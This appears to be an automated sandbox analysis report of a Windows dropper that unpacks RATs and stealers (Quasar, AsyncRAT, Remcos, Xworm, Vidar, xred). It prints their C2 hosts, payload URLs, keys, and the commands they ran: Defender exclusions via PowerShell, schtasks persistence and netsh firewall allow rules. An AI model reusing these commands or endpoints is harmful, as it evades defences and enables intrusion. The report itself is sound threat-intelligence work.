Analysis

  • max time kernel
    132s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    26-01-2025 00:01

General

  • Target

    New Text Document mod.exe

  • Size

    761KB

  • MD5

    c6040234ee8eaedbe618632818c3b1b3

  • SHA1

    68115f8c3394c782aa6ba663ac78695d2b80bf75

  • SHA256

    bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0

  • SHA512

    a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf

  • SSDEEP

    12288:mMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9mWej:mnsJ39LyjbJkQFMhmC+6GD9I

Malware Config

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    [email protected]

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

remcos

Botnet

RemoteHost

C2

else-directors.gl.at.ply.gg:56448

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    $77-Bitdefender.exe

  • copy_folder

    Bitdefender

  • delete_file

    true

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    true

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-Z3DS2J

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    VisualStudioServer

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Extracted

Family

vidar

C2

https://t.me/sc1phell

https://steamcommunity.com/profiles/76561199819539662

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Program

C2

tuna91.duckdns.org:1604

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    true

  • install_file

    system.exe

  • install_folder

    %AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

bot

C2

wexos47815-61484.portmap.host:61484

Mutex

06e2bb33-968c-4ca7-97dc-f23fbd5c3092

Attributes
  • encryption_key

    8924CB3C9515DA437A37F5AE598376261E5528FC

  • install_name

    msinfo32.exe

  • log_directory

    Update

  • reconnect_delay

    3000

  • startup_key

    Discordupdate

  • subdirectory

    dll32

Extracted

Family

xworm

Version

3.1

C2

172.86.108.55:7771

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Extracted

Family

xworm

Version

5.0

Mutex

WlO6Om8yfxIARVE4

Attributes
  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/7G6zzQwJ

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

VM-KU

C2

adidya354-21806.portmap.host:21806

Mutex

cf7c4d30-a326-47cc-a5f0-5a19aa014204

Attributes
  • encryption_key

    E50BC33BC56B70B1A2963DE6EA1855A0E0D0FBCE

  • install_name

    Windows Shell Interactive.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows Shell Interactive

Extracted

Family

asyncrat

Version

A 13

Botnet

Default

C2

163.172.125.253:333

Mutex

AsyncMutex_555223

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

192.168.1.79:4782

193.161.193.99:20466

0.tcp.in.ngrok.io:14296

Mutex

956eafb2-7482-407b-bff4-d2b57a1c3d75

Attributes
  • encryption_key

    EFEBD005E03B8B8669985D9A167E2BEF9FFCA477

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Extracted

Family

quasar

Version

1.4.1

Botnet

ROBLOX EXECUTOR

C2

192.168.50.1:4782

10.0.0.113:4782

LETSQOOO-62766.portmap.host:62766

89.10.178.51:4782

Mutex

90faf922-159d-4166-b661-4ba16af8650e

Attributes
  • encryption_key

    FFEE70B90F5EBED6085600C989F1D6D56E2DEC26

  • install_name

    windows 3543.exe

  • log_directory

    roblox executor

  • reconnect_delay

    3000

  • startup_key

    windows background updater

  • subdirectory

    windows updater

Extracted

Family

quasar

Version

1.3.0.0

Botnet

School

C2

gamwtonxristo.ddns.net:1717

Mutex

QSR_MUTEX_M3Vba1npfJg3Ale25C

Attributes
  • encryption_key

    VtojWKM7f1XyCVdB41wL

  • install_name

    comctl32.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Windows Defender Startup Scan

  • subdirectory

    Windows Defender

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

2.tcp.eu.ngrok.io:19695

Mutex

gonq3XlXWgiz

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Detect Vidar Stealer 3 IoCs
  • Detect Xworm Payload 5 IoCs
  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

  • Nanocore family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 27 IoCs
  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xred

    Xred is backdoor written in Delphi.

  • Xred family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Async RAT payload 1 IoCs
  • Adds policy Run key to start application 2 TTPs 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 29 IoCs
  • Modifies Windows Firewall 2 TTPs 18 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Drops startup file 55 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 10 IoCs
  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 39 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops autorun.inf file 1 TTPs 4 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 48 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 38 IoCs
  • Drops file in Windows directory 22 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 45 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 28 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 37 IoCs
  • Modifies registry key 1 TTPs 5 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 28 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 41 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    1⤵
    • Loads dropped DLL
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2508
    • C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
      2⤵
      • Downloads MZ/PE file
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2348
      • C:\Users\Admin\AppData\Local\Temp\a\test.exe
        "C:\Users\Admin\AppData\Local\Temp\a\test.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1080
      • C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe
        "C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies system certificate store
        PID:3012
      • C:\Users\Admin\AppData\Local\Temp\a\T.exe
        "C:\Users\Admin\AppData\Local\Temp\a\T.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:3376
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
          "Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\T.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe' -Force
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2396
      • C:\Users\Admin\AppData\Local\Temp\a\36.exe
        "C:\Users\Admin\AppData\Local\Temp\a\36.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:1732
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 156
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:2496
      • C:\Users\Admin\AppData\Local\Temp\a\99999.exe
        "C:\Users\Admin\AppData\Local\Temp\a\99999.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:4000
        • C:\Users\Admin\AppData\Roaming\server.exe
          "C:\Users\Admin\AppData\Roaming\server.exe"
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Drops autorun.inf file
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: GetForegroundWindowSpam
          PID:1388
          • C:\Windows\SysWOW64\netsh.exe
            netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE
            5⤵
            • Modifies Windows Firewall
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:3844
      • C:\Users\Admin\AppData\Local\Temp\a\22.exe
        "C:\Users\Admin\AppData\Local\Temp\a\22.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of SetWindowsHookEx
        PID:4108
      • C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe
        "C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        PID:4864
        • C:\Windows\system32\schtasks.exe
          "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:4032
        • C:\Windows\system32\dll32\msinfo32.exe
          "C:\Windows\system32\dll32\msinfo32.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:4708
          • C:\Windows\system32\schtasks.exe
            "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:3108
          • C:\Windows\system32\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Local\Temp\AclqLgFB8I0B.bat" "
            5⤵
              PID:3976
              • C:\Windows\system32\chcp.com
                chcp 65001
                6⤵
                  PID:4300
                • C:\Windows\system32\PING.EXE
                  ping -n 10 localhost
                  6⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Runs ping.exe
                  PID:4464
                • C:\Windows\system32\dll32\msinfo32.exe
                  "C:\Windows\system32\dll32\msinfo32.exe"
                  6⤵
                  • Executes dropped EXE
                  • Drops file in System32 directory
                  PID:3264
                  • C:\Windows\system32\schtasks.exe
                    "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3364
                  • C:\Windows\system32\cmd.exe
                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\h1jVzK3VHgGC.bat" "
                    7⤵
                      PID:2008
                      • C:\Windows\system32\chcp.com
                        chcp 65001
                        8⤵
                          PID:764
                        • C:\Windows\system32\PING.EXE
                          ping -n 10 localhost
                          8⤵
                          • System Network Configuration Discovery: Internet Connection Discovery
                          • Runs ping.exe
                          PID:2492
                        • C:\Windows\system32\dll32\msinfo32.exe
                          "C:\Windows\system32\dll32\msinfo32.exe"
                          8⤵
                          • Executes dropped EXE
                          • Drops file in System32 directory
                          PID:1660
                          • C:\Windows\system32\schtasks.exe
                            "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                            9⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:2288
                          • C:\Windows\system32\cmd.exe
                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\NFL5X40U9rBT.bat" "
                            9⤵
                              PID:3164
                              • C:\Windows\system32\chcp.com
                                chcp 65001
                                10⤵
                                  PID:3136
                                • C:\Windows\system32\PING.EXE
                                  ping -n 10 localhost
                                  10⤵
                                  • System Network Configuration Discovery: Internet Connection Discovery
                                  • Runs ping.exe
                                  PID:3484
                                • C:\Windows\system32\dll32\msinfo32.exe
                                  "C:\Windows\system32\dll32\msinfo32.exe"
                                  10⤵
                                  • Executes dropped EXE
                                  • Drops file in System32 directory
                                  PID:4120
                                  • C:\Windows\system32\schtasks.exe
                                    "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                    11⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:784
                                  • C:\Windows\system32\cmd.exe
                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\yP7ocPgnzpZX.bat" "
                                    11⤵
                                      PID:576
                                      • C:\Windows\system32\chcp.com
                                        chcp 65001
                                        12⤵
                                          PID:1356
                                        • C:\Windows\system32\PING.EXE
                                          ping -n 10 localhost
                                          12⤵
                                          • System Network Configuration Discovery: Internet Connection Discovery
                                          • Runs ping.exe
                                          PID:3080
                                        • C:\Windows\system32\dll32\msinfo32.exe
                                          "C:\Windows\system32\dll32\msinfo32.exe"
                                          12⤵
                                          • Executes dropped EXE
                                          • Drops file in System32 directory
                                          PID:2172
                                          • C:\Windows\system32\schtasks.exe
                                            "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                            13⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:1948
                                          • C:\Windows\system32\cmd.exe
                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\5CN0SmO4YDaR.bat" "
                                            13⤵
                                              PID:3220
                                              • C:\Windows\system32\chcp.com
                                                chcp 65001
                                                14⤵
                                                  PID:1632
                                                • C:\Windows\system32\PING.EXE
                                                  ping -n 10 localhost
                                                  14⤵
                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                  • Runs ping.exe
                                                  PID:1920
                                                • C:\Windows\system32\dll32\msinfo32.exe
                                                  "C:\Windows\system32\dll32\msinfo32.exe"
                                                  14⤵
                                                  • Executes dropped EXE
                                                  • Drops file in System32 directory
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:536
                                                  • C:\Windows\system32\schtasks.exe
                                                    "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                    15⤵
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4736
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\RH1PaQhQWwXm.bat" "
                                                    15⤵
                                                      PID:3532
                                                      • C:\Windows\system32\chcp.com
                                                        chcp 65001
                                                        16⤵
                                                          PID:1096
                                                        • C:\Windows\system32\PING.EXE
                                                          ping -n 10 localhost
                                                          16⤵
                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                          • Runs ping.exe
                                                          PID:1504
                                                        • C:\Windows\system32\dll32\msinfo32.exe
                                                          "C:\Windows\system32\dll32\msinfo32.exe"
                                                          16⤵
                                                          • Executes dropped EXE
                                                          • Drops file in System32 directory
                                                          PID:2012
                                                          • C:\Windows\system32\schtasks.exe
                                                            "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                            17⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:876
                                                          • C:\Windows\system32\cmd.exe
                                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\XxLvY69ABsZF.bat" "
                                                            17⤵
                                                              PID:4600
                                                              • C:\Windows\system32\chcp.com
                                                                chcp 65001
                                                                18⤵
                                                                  PID:5044
                                                                • C:\Windows\system32\PING.EXE
                                                                  ping -n 10 localhost
                                                                  18⤵
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  • Runs ping.exe
                                                                  PID:932
                                                                • C:\Windows\system32\dll32\msinfo32.exe
                                                                  "C:\Windows\system32\dll32\msinfo32.exe"
                                                                  18⤵
                                                                  • Drops file in System32 directory
                                                                  PID:3108
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                                    19⤵
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:3392
                                                                  • C:\Windows\system32\cmd.exe
                                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\NLqbDa60jHZY.bat" "
                                                                    19⤵
                                                                      PID:4736
                                                                      • C:\Windows\system32\chcp.com
                                                                        chcp 65001
                                                                        20⤵
                                                                          PID:2460
                                                                        • C:\Windows\system32\PING.EXE
                                                                          ping -n 10 localhost
                                                                          20⤵
                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                          • Runs ping.exe
                                                                          PID:4752
                                                                        • C:\Windows\system32\dll32\msinfo32.exe
                                                                          "C:\Windows\system32\dll32\msinfo32.exe"
                                                                          20⤵
                                                                          • Drops file in System32 directory
                                                                          PID:2392
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                                            21⤵
                                                                            • Scheduled Task/Job: Scheduled Task
                                                                            PID:1056
                                                                          • C:\Windows\system32\cmd.exe
                                                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\1gDcq6KwkC4i.bat" "
                                                                            21⤵
                                                                              PID:4156
                                                                              • C:\Windows\system32\chcp.com
                                                                                chcp 65001
                                                                                22⤵
                                                                                  PID:2664
                                                                                • C:\Windows\system32\PING.EXE
                                                                                  ping -n 10 localhost
                                                                                  22⤵
                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                  • Runs ping.exe
                                                                                  PID:5092
                                                                                • C:\Windows\system32\dll32\msinfo32.exe
                                                                                  "C:\Windows\system32\dll32\msinfo32.exe"
                                                                                  22⤵
                                                                                  • Drops file in System32 directory
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:2948
                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                    "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                                                    23⤵
                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                    PID:2240
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\QZQBLEqosfSN.bat" "
                                                                                    23⤵
                                                                                      PID:3324
                                                                                      • C:\Windows\system32\chcp.com
                                                                                        chcp 65001
                                                                                        24⤵
                                                                                          PID:4700
                                                                                        • C:\Windows\system32\PING.EXE
                                                                                          ping -n 10 localhost
                                                                                          24⤵
                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                          • Runs ping.exe
                                                                                          PID:2140
                                                                                        • C:\Windows\system32\dll32\msinfo32.exe
                                                                                          "C:\Windows\system32\dll32\msinfo32.exe"
                                                                                          24⤵
                                                                                            PID:3372
                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                              "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                                                              25⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:2676
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\q55bgR7thNVT.bat" "
                                                                                              25⤵
                                                                                                PID:2516
                                                                                                • C:\Windows\system32\chcp.com
                                                                                                  chcp 65001
                                                                                                  26⤵
                                                                                                    PID:2108
                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                    ping -n 10 localhost
                                                                                                    26⤵
                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                    • Runs ping.exe
                                                                                                    PID:4764
                                                                                                  • C:\Windows\system32\dll32\msinfo32.exe
                                                                                                    "C:\Windows\system32\dll32\msinfo32.exe"
                                                                                                    26⤵
                                                                                                      PID:4276
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        "schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f
                                                                                                        27⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:3736
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\QCGANXGlRZof.bat" "
                                                                                                        27⤵
                                                                                                          PID:3144
                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                            chcp 65001
                                                                                                            28⤵
                                                                                                              PID:768
                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                              ping -n 10 localhost
                                                                                                              28⤵
                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                              • Runs ping.exe
                                                                                                              PID:4944
                                                          • C:\Users\Admin\AppData\Local\Temp\a\Network.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\a\Network.exe"
                                                            3⤵
                                                            • Drops startup file
                                                            • Executes dropped EXE
                                                            • Adds Run key to start application
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:2000
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Network.exe'
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:4572
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:3156
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Network.exe'
                                                              4⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:2584
                                                            • C:\Windows\System32\schtasks.exe
                                                              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Network" /tr "C:\Users\Admin\AppData\Roaming\Network.exe"
                                                              4⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:4916
                                                          • C:\Users\Admin\AppData\Local\Temp\a\rea.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\a\rea.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:3472
                                                            • \??\c:\program files (x86)\internet explorer\iexplore.exe
                                                              "c:\program files (x86)\internet explorer\iexplore.exe"
                                                              4⤵
                                                                PID:3576
                                                            • C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              • Checks whether UAC is enabled
                                                              • Drops file in Program Files directory
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                              PID:3452
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                "schtasks.exe" /create /f /tn "SCSI Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmpE62.tmp"
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:4212
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                "schtasks.exe" /create /f /tn "SCSI Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmp10A5.tmp"
                                                                4⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:4636
                                                            • C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:3088
                                                            • C:\Users\Admin\AppData\Local\Temp\a\mod.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\a\mod.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3280
                                                            • C:\Users\Admin\AppData\Local\Temp\a\Server.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\a\Server.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              PID:2376
                                                              • C:\Users\Admin\AppData\Local\Temp\server.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\server.exe"
                                                                4⤵
                                                                • Drops startup file
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Drops file in System32 directory
                                                                • Drops file in Program Files directory
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3960
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
                                                                  5⤵
                                                                  • Modifies Windows Firewall
                                                                  • Event Triggered Execution: Netsh Helper DLL
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:4612
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
                                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:1512
